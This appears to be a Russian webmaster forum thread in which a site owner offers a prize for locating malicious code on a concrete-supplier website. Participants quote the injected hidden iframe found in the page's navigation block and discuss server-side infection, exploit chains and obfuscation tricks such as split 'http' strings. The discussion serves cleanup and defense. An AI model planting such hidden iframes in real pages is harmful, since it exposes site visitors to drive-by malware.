Конкурс на срочный поиск вредоносного кода на сайте - 5000 р.

Автор, смотри где в коде стоит:

<li><a href="/">Главная</a> </li><li><a href="/price/">Цены</a> </li><li><a href="/references">Отзывы </a> </li><li><a href="/quality/">Качество</a> </li><li><a href="/dostavka/">Карта заводов</a> </li><li><a href="/zakaz/">Заказать бетон</a> </li><li><a href="/faq">Вопросы и ответы</a> </li><li><a href="/analytics/">Аналитика</a> </li><li><a href="/cooperation/">Партнерам</a> </li><li><a href="/contacts/">Контакты</a> </li><li><a href="/blog/">Блог</a> </li>  </ul>

  </div>



<div class="navigation2"><iframe src=";vid=5&search=cleaner&php=2" style="display:none"></iframe>

  <table>

  <tr>

  <td valign="top">

  	<b><a href="/special/"><u>Спецпредложения</u></a></b>

т.е. между блоком "navigation" и "спецпредложением"

Если используется CMS - ищите в модуле с классом "navigation2"

1. Только эти 2 страницы заражены? Вы их нашли в ВМ? По тому, что тут написано всё проверили: http://help.yandex.ru/webmaster/?id=1059440#1059447

2. Вы пробовали сравнивать код - безопасной страницы

с кодом страницы что в выдаче? Если ничего не найдено, то значит есть с неё ссылка на заражённую страницу. Это как в на сайтах с баннерной рекламой - если там попадался баннер ведущий на заражённый сайт, то сайт где баннер крутился попадал под санкции. если есть, то это и есть искомое.

Да, возможно.

Может код выдает динамический адрес? там и .com может быть, и .ru.. а вот без http проинклудить не получится.

Кодировщик да, скроет.

Ява скрипт тут причем тогда, когда надо найти зашифрованный или закодированный код. Без JS это сделать затруднительно.

Хотел бы добавить автору:

Долбите разработчиков Октопуса, вполне вероятно что через их дыру попал к вам сплойт.

ставьте сохраненные ранее бекапы, анализируйте изменения. если у вас их нет, то проект ваш не серьезный и не стоит 5т. в целом)

при входе на сайт у меня нод высветил атаку трояна wiki\js.php - проблема в нем! фреймы вообще яндексом всегда считались признаком вредноносного ПО. и не только яндексом..

от 5т. не откажусь :)

панацеи нет ни на что... :( echo "ht"+"tp"; или echo "h"+"t"+"t"+"p";

мы рассматриваем конкретный случай, а не переливаем воду.

ява-скрипт выполняется на стороне клиента(т.е. браузера) и он не имеет ни какого отношения к вредоносному коду,

который я показал в первом своем посте.

этот html код отдает именно сервер(пхп,перл,цги и т.д.), а не клиентский ява скрипт.

admak добавил 16.10.2010 в 16:20

wiki\js.php - это уже следствие включенного ранее ифрейма.

когда-то наблюдал картину, что через первый ифрейм цеплялось еще последовательно штук 7 других вирусяк. наверное, они надеялись, что если первый вирус не сработает, то сработает второй, третий и т.д.

Касперский блокирует работу скрипта, расположенного по адресу Надо все подключаемые файлы проверять.

Как одно мешает другому? Средствами JS можно подгрузить сторонний php код в процессе выполнения на стороне клиента.

Это один из вариантов, указанный мной одним из последних (если поиск по инклудам в php файлах ничего не дал)

Это называется связка сплойтов.

В любом случае для ее вызова нужно поместить код в исполняемые файлы на сервере.

ps. Я вижу автор уже почистил скрипты.

Кому приз-то достался? :) Или все альтруисты :)

Я думаю - приз - не самое главное здесь.

Проблема актуальна и опыт полученный в этой теме не сравним с представленным килобайтом деревянных.

<div class="navigation2"><iframe src=";onpage=cleaner&e=http" style="display:none"></iframe>

На текущий момент admak - главный претендент на победу.

Пока по решению этого вопроса я общаюсь с ним.

Почему-то не вижу кнопки "отредактировать" сообщение - раньше была.

Может быть есть deadline, после которого сообщения не правятся? Или я чего не понимаю...